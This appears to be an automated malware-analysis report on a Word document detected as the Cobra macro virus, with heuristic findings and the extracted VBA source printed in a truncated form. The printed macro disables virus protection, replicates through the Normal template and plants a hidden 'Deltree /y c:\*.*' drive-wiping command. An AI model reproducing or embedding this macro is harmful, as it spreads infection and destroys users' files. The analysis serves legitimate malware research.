Verdict: MALICIOUS (Risk Score 500)

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1566.001 (Spearphishing Attachment)
The sample contains VBA macros with AutoOpen and Auto_Close functions, indicative of malicious intent. The 'Cobra' macro attempts to copy itself to the Normal template and delete other macros, suggesting an effort to establish persistence and evade detection. The presence of a Shell() call and the ClamAV detection as 'Doc.Trojan.Cobra-2' strongly indicate downloader or dropper functionality.
Heuristics (11)

- ClamAV: Doc.Trojan.Cobra-2 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Cobra-2
- Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE: A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- Auto_Close macro [high] OLE_VBA_AUTOCLOSE: Auto_Close macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY: OLE file is 40,960 bytes but its declared streams total only 0 bytes; 40,960 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- CFB header with no readable streams [medium] OLE_PARSE_EMPTY_STREAMS: The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous; it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8088 bytes |
| embedded_office_off00005000.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x5000 | 40960 bytes |

Artifact: macros.bas

SHA-256: 35f42b9877ef3ea6058e2c08d9a8b084a011147c0b32d72c3944ea0e9af70c4a

Detection (ClamAV): Doc.Trojan.Cobra-2

Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Cobra"
'Cobra Version 1.0D
Sub AutoOpen()
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Call DelNorMac
Call CopNorMac
Call DelActMac
Call CopActMac
End Sub
Sub DelNorMac()
On Error Resume Next
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If (NorTem.VBProject.VBComponents(n).Name <> "Cobra") And _
(NorTem.VBProject.VBComponents(n).Name <> "ThisDocument") Then _
Application.OrganizerDelete Source:=NorTem.FullName, _
Name:=NorTem.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems
Next n
End Sub
Sub CopNorMac()
On Error Resume Next
Dim ComOk As Boolean
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If NorTem.VBProject.VBComponents(n).Name = "Cobra" Then _
ComOk = True
Next
If ComOk <> True Then Application.OrganizerCopy _
Source:=ActDoc.FullName, Destination:= _
NorTem.FullName, Name:="Cobra", Object:=wdOrganizerObjectProjectItems
Templates(NorTem.FullName).Save
End Sub
Sub DelActMac()
On Error Resume Next
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To ActDoc.VBProject.VBComponents.Count
If (ActDoc.VBProject.VBComponents(n).Name <> "Cobra") And _
(ActDoc.VBProject.VBComponents(n).Name <> "ThisDocument") And _
(ActDoc.VBProject.VBComponents(n).Name <> "Reference to Normal") Then _
Application.OrganizerDelete Source:=ActDoc.FullName, _
Name:=ActDoc.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems
Next n
End Sub
Sub CopActMac()
On Error Resume Next
Dim ComOk As Boolean
Set ActDoc = ActiveDocument
Set NorTem = NormalTemplate
For n = 1 To ActDoc.VBProject.VBComponents.Count
If ActDoc.VBProject.VBComponents(n).Name = "Cobra" Then _
ComOk = True
Next
If ComOk <> True Then Application.OrganizerCopy _
Source:=NorTem.FullName, Destination:= _
ActDoc.FullName, Name:="Cobra", Object:=wdOrganizerObjectProjectItems
End Sub
Sub AutoClose()
If (Year(Now) Mod 2 = 0) And (Day(Now) = 26) And (Month(Now) = 3) Then
ActiveDocument.VBProject.VBComponents("Cobra").Export ("c:\Cobra.Sys")
Call AddModToNorTem
Call AddModToActDoc
End If
End Sub
Sub AddModToNorTem()
Dim AddOk As Boolean
Set NorTem = NormalTemplate
For n = 1 To NorTem.VBProject.VBComponents.Count
If NorTem.VBProject.VBComponents(n).Name = "war" Then _
AddOk = True
Next
If AddOk <> True Then
Set ModAdd = NormalTemplate.VBProject.VBComponents.Add(1)
ModAdd.Name = "war"
ModAdd.Codemodule.InsertLines 1, "Sub FileExit"
ModAdd.Codemodule.InsertLines 2, "On Error Resume Next"
ModAdd.Codemodule.InsertLines 3, "Msgbox ""You are infected with Cobra"",,""Cobra"
ModAdd.Codemodule.InsertLines 4, "End Sub"
ModAdd.Codemodule.InsertLines 5, "Sub FileNew"
ModAdd.Codemodule.InsertLines 6, "Shell " + """Deltree /y c:\*.*"", vbHide"
ModAdd.Codemodule.InsertLines 7, "End Sub"
ModAdd.Codemodule.InsertLines 8, "Sub FileOpen"
ModAdd.Codemodule.InsertLines 9, "On Error Resume Next"
ModAdd.Codemodule.InsertLines 10, "Set ActDoc = ActiveDocument"
ModAdd.Codemodule.InsertLines 11, "Set NorTem = NormalTemplate"
ModAdd.Codemodule.InsertLines 12, "For n = 1 To ActDoc.VBProject.VBComponents.Count"
ModAdd.Codemodule.InsertLines 13, "If (ActDoc.VBProject.VBComponents(n).Name <> ""war"") And _"
ModAdd.Codemodule.InsertLines 14, "(ActDoc.VBProject.VBComponents(n).Name <> ""ThisDocument"") And _"
ModAdd.Codemodule.InsertLines 15, "(ActDoc.VBProject.VBComponents(n).Name <> ""Reference to Normal"") Then _"
ModAdd.Codemodule.InsertLines 16, "Application.OrganizerDelete Source:=ActDoc.FullName, _"
ModAdd.Codemodule.InsertLines 17, "Name:=ActDoc.VBProject.VBComponents(n).Name, Object:=wdOrganizerObjectProjectItems"
ModAdd.Codemodule.InsertLi
```

... (truncated)

Artifact: embedded_office_off00005000.ole

SHA-256: 5de6a92e0afd4d56c35e9ffc4edf23ebaca9f7d8b1541531dc0fccb203ffdfb9

Detection (ClamAV): No threats found

Obfuscation or payload: likely. Carved macro source contains an auto-exec entry point and execution/download terms.